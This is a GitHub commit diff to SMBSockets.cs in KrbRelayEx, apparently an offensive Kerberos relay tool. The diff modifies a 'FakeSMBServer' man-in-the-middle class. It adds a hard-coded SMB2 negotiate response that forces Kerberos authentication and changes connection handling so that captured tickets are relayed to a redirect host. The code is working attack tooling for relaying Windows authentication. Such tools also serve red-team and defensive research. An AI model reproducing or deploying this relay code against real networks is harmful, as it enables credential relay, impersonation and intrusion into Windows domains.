Skip to content

Commit f29def0

Browse files
decoder-itdecoder-it
authored
Update SMBSockets.cs
1 parent ac2ce2e commit f29def0

File tree

1 file changed

+47
-7
lines changed

1 file changed

+47
-7
lines changed

KrbRelayEx/Clients/Attacks/Smb/SMBSockets.cs

Lines changed: 47 additions & 7 deletions
Original file line numberDiff line numberDiff line change
@@ -1,4 +1,5 @@
1-
using KrbRelay.Clients;
1+
2+
using KrbRelay.Clients;
23
using KrbRelay;
34
using SMBLibrary.Client;
45
using SMBLibrary;
@@ -156,7 +157,8 @@ public class FakeSMBServer
156157
0x00, 0x00, 0x01, 0x00, 0x02, 0x00, 0x00, 0x00, 0x00, 0x00, 0x07, 0x00, 0x0C, 0x00, 0x00, 0x00, 0x00, 0x00, 0x02, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x01, 0x00,
157158
0x02, 0x00, 0x00, 0x00, 0x00, 0x00, 0x03, 0x00, 0x0C, 0x00, 0x00, 0x00, 0x00, 0x00, 0x02, 0x00, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00, 0x02, 0x00, 0x04, 0x00};
158159

159-
160+
byte[] smb2NegotiateKerberosProtocolResponse = { 0x0, 0x0, 0x0, 0xd4, 0xfe, 0x53, 0x4d, 0x42, 0x40, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x1, 0x0, 0x1, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x41, 0x0, 0x1, 0x0, 0x2, 0x2, 0x0, 0x0, 0x57, 0x50, 0x73, 0x64, 0x50, 0x4d, 0x6a, 0x73, 0x65, 0x4f, 0x5a, 0x62, 0x43, 0x56, 0x64, 0x6a, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x1, 0x0, 0x0, 0x0, 0x1, 0x0, 0x0, 0x0, 0x1, 0x0, 0x80, 0x8d, 0x8c, 0xcc, 0xe, 0xe4, 0xdb, 0x1, 0x80, 0x8d, 0x8c, 0xcc, 0xe, 0xe4, 0xdb, 0x1, 0x80, 0x0, 0x54, 0x0, 0x0, 0x0, 0x0, 0x0, 0x60, 0x52, 0x6, 0x6, 0x2b, 0x6, 0x1, 0x5, 0x5, 0x2, 0xa0, 0x48, 0x30, 0x46, 0xa0, 0x18, 0x30, 0x16, 0x6, 0x9, 0x2a, 0x86, 0x48, 0x86, 0xf7, 0x12, 0x1, 0x2, 0x2, 0x6, 0x9, 0x2a, 0x86, 0x48, 0x82, 0xf7, 0x12, 0x1, 0x2, 0x2, 0xa3, 0x2a, 0x30, 0x28, 0xa0, 0x26, 0x1b, 0x24, 0x6e, 0x6f, 0x74, 0x5f, 0x64, 0x65, 0x66, 0x69, 0x6e, 0x65, 0x64, 0x5f, 0x69, 0x6e, 0x5f, 0x52, 0x46, 0x43, 0x34, 0x31,
161+
0x37, 0x38, 0x40, 0x70, 0x6c, 0x65, 0x61, 0x73, 0x65, 0x5f, 0x69, 0x67, 0x6e, 0x6f, 0x72, 0x65 };
160162
public FakeSMBServer(int listenPort, string targetHost, int targetPort)
161163
{
162164
/*_listenerSocket = new Socket(AddressFamily.InterNetwork, SocketType.Stream, ProtocolType.Tcp);
@@ -192,7 +194,7 @@ public void Start(bool fwd)
192194
_isRunning = true;
193195
_listenerSocket.BeginAccept(OnClientConnect, null);
194196

195-
197+
196198

197199
}
198200
public void Stop()
@@ -281,13 +283,51 @@ private void OnDataFromClient(IAsyncResult ar)
281283
{
282284

283285
Program.forwdardmode = true;
286+
287+
if(Helpers.PatternAt(state.Buffer, new byte[] { 0xfe, 0x53 }) > -1)
288+
{
289+
/*Program.forwdardmode = false;
284290
291+
byte[] AccessDeniedPacket = new byte[]
292+
{
293+
0x00, 0x00, 0x00, 0x48,
294+
0xFE, 0x53, 0x4D, 0x42,
295+
0x40, 0x00, 0x01, 0x00,
296+
//0x22, 0x00, 0x00, 0xC0,
297+
0x5C, 0x03, 0x00, 0xC0,
298+
0x03, 0x00, 0x01, 0x00,
299+
0x19, 0x00, 0x00, 0x00,
300+
0x00, 0x00, 0x00, 0x00,
301+
0x00, 0x00, 0x00, 0x00,
302+
0x00, 0x00, 0x00, 0x00,
303+
0xFF, 0xFE, 0x00, 0x00,
304+
0x00, 0x00, 0x00, 0x00,
305+
0x00, 0x00, 0x00, 0x00,
306+
0x00, 0x00, 0x00, 0x00,
307+
0x31, 0x12, 0xDA, 0x4A,
308+
0x6E, 0xBC, 0xDA, 0x94,
309+
0xB3, 0x29, 0x2B, 0x8A,
310+
0x5E, 0x23, 0xF0, 0x14,
311+
0x09, 0x00, 0x00, 0x00,
312+
0x00, 0x00, 0x00, 0x00
313+
};
314+
315+
state.SourceSocket.Send(AccessDeniedPacket, AccessDeniedPacket.Length, SocketFlags.None);
316+
*/
317+
CloseConnection(state);
318+
//Stop();
319+
//Start(false);
320+
return;
321+
}
285322
state.isRelayed = true;
286-
Console.WriteLine("[*] MiTMServer [{0}]: sending smbNegotiateProtocolResponse", state.SourceSocket.RemoteEndPoint);
323+
/*Console.WriteLine("[*] MiTMServer [{0}]: sending smbNegotiateProtocolResponse", state.SourceSocket.RemoteEndPoint);
287324
state.SourceSocket.Send(smbNegotiateProtocolResponse, smbNegotiateProtocolResponse.Length, SocketFlags.None);
288325
l = state.SourceSocket.Receive(buffer);
289326
Console.WriteLine("[*] MiTMServer [{0}]: sending smb3NegotiateProtocolResponse", state.SourceSocket.RemoteEndPoint);
290327
state.SourceSocket.Send(smb3NegotiateProtocolResponse, smb3NegotiateProtocolResponse.Length, SocketFlags.None);
328+
l = state.SourceSocket.Receive(buffer);*/
329+
Console.WriteLine("[*] MiTMServer [{0}]: sending smb2NegotiateKerberpsProtocolResponse", state.SourceSocket.RemoteEndPoint);
330+
state.SourceSocket.Send(smb2NegotiateKerberosProtocolResponse, smb2NegotiateKerberosProtocolResponse.Length, SocketFlags.None);
291331
l = state.SourceSocket.Receive(buffer);
292332
//int ticketOffset = Helpers.PatternAt(buffer, new byte[] { 0x60, 0x82 }); // 0x6e, 0x82, 0x06
293333
buffer = buffer.Skip(4).ToArray();
@@ -333,8 +373,8 @@ private void OnDataFromClient(IAsyncResult ar)
333373
smbc.currSourceSocket = state.SourceSocket;
334374
smbc.currDestSocket = state.TargetSocket;
335375
smbc.ServerType = ServerType;
336-
smbc.curSocketServer = this;
337-
bool isConnected = smbc.Connect(IPAddress.Parse(Program.RedirectHost) , SMBTransportType.DirectTCPTransport);
376+
smbc.currSocketServer = this;
377+
bool isConnected = smbc.Connect(IPAddress.Parse(Program.RedirectHost), SMBTransportType.DirectTCPTransport);
338378
if (!isConnected)
339379
{
340380
Console.WriteLine("[-] Could not connect to [{0}:445]", Program.RedirectHost);
@@ -480,4 +520,4 @@ public void CloseConnection(State state)
480520
//Console.WriteLine($"Error closing connection: {ex.Message}");
481521
}
482522
}
483-
}
523+
}

0 commit comments

Comments
 (0)